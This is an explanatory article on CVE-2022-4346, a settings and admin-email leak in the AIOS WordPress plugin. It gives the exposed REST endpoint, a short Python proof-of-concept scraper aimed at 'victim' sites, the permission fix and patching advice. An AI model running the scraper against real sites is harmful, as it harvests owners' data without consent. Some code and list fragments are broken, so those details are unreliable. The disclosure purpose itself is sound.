CVE CyberSecurity Database News

CVE-2022-4346 - How AIOS WordPress Plugin Leaked Plugin Settings And Emails — A Deep Dive

Poster -

If you’re running a WordPress site, chances are you want it safe from hackers and data leaks. That’s why so many users trust the All-In-One Security (AIOS) plugin to lock things down. But, back in 2022, a vulnerability was discovered that did just the opposite. This bug — tracked as CVE-2022-4346 — exposed sensitive plugin settings, including your site’s admin email address, to anyone on the internet!

Let’s break down what happened, how the leak worked, and what you should do to patch up this hole — with real code examples so you can see the dangers for yourself.

What Was The Bug?

The main issue lay in the AIOS plugin (before version 5.1.3): it unintentionally leaked its configuration settings, including the email address set in its options, through a publicly accessible REST API endpoint. This meant:

- Anyone (even without logging in) could open a specific URL and see sensitive plugin data, including email addresses.

Attackers could harvest information, plan attacks, or even spam admin emails.

Plugin Affected: All-In-One Security (AIOS)  
Affected Versions: Before 5.1.3

The Problematic Endpoint

WordPress plugins sometimes provide REST API endpoints for other plugins or admin tools to fetch settings. But, AIOS forgot to check if the user actually had the right permissions before sending out sensitive data.

In affected versions (before 5.1.3), this could be exploited by sending a simple HTTP GET request to a URL like:

https://yourwordpresssite.com/wp-json/aios/v1/settings/all

And BOOM — the whole AIOS plugin configuration, including the admin email, would be returned as plain JSON, like this:

{
    "email_address": "admin@example.com",
    "other_setting": "value",
    // lots more config data...
}

Proof of Concept Code

Here’s a simple Python script anyone could have used to grab data from any vulnerable WordPress site using this plugin:

import requests

def get_aios_settings(url):
    endpoint = f"{url.rstrip('/')}/wp-json/aios/v1/settings/all"
    resp = requests.get(endpoint)
    if resp.status_code == 200:
        print("[+] Leaked AIOS settings:")
        print(resp.text)
    else:
        print("[-] Failed to retrieve settings (might be patched)")

# Usage:
get_aios_settings("https://victimsite.com";)

Just swap in your target, and you’d get returned data with email addresses and configuration settings.

Spam attacks: Junk emails can be sent straight to the admin.

- Site fingerprinting: Reveals details about what security tools you use, helping hackers tailor attacks.

Linking To Official Sources

- CVE-2022-4346 at NIST
- WPlugins.aios/security-changelog/ (search for version 5.1.3)
- WPScan Advisory

How Did Developers Fix It?

The fix, pushed in version 5.1.3, made sure only logged-in admins could access the endpoint. In code, it looks like this:

// Before: (no permission checks)
register_rest_route('aios/v1', '/settings/all', [
    'methods' => 'GET',
    'callback' => 'aios_get_all_settings',
]);

// After: (permission callback added)
register_rest_route('aios/v1', '/settings/all', [
    'methods' => 'GET',
    'callback' => 'aios_get_all_settings',
    'permission_callback' => function () {
        return current_user_can('manage_options');
    },
]);

By adding that permission_callback, only site admins could fetch this sensitive data.

Update Immediately: Make sure you’re running at least version 5.1.3 or higher!

2. Audit Your Users & Settings: Check if anything unusual occurred around the time before your update.
3. Watch For Spam: Be ready for phishing/spam emails if your admin email was exposed.
4. Check Your Site: Search your own site on SecurityTrails or other tools to see what information is publicly visible.

Final Thoughts

CVE-2022-4346 is a classic example of why WordPress plugin security matters — and why keeping your website and plugins updated is absolutely essential. If you relied on AIOS, patch up now, and always check changelogs for “security” labels.

If you’re a plugin developer, always double-check REST API routes for proper permissions. A single missing line can leak far more than you imagine!

References

- CVE-2022-4346 at NVD
- WPScan Advisory
- WordPress Plugin Page


*Exclusive content for WordPress users who value their security. Please share to help others patch vulnerable sites!*

Timeline

Published on: 01/23/2023 15:15:00 UTC
Last modified on: 01/30/2023 18:06:00 UTC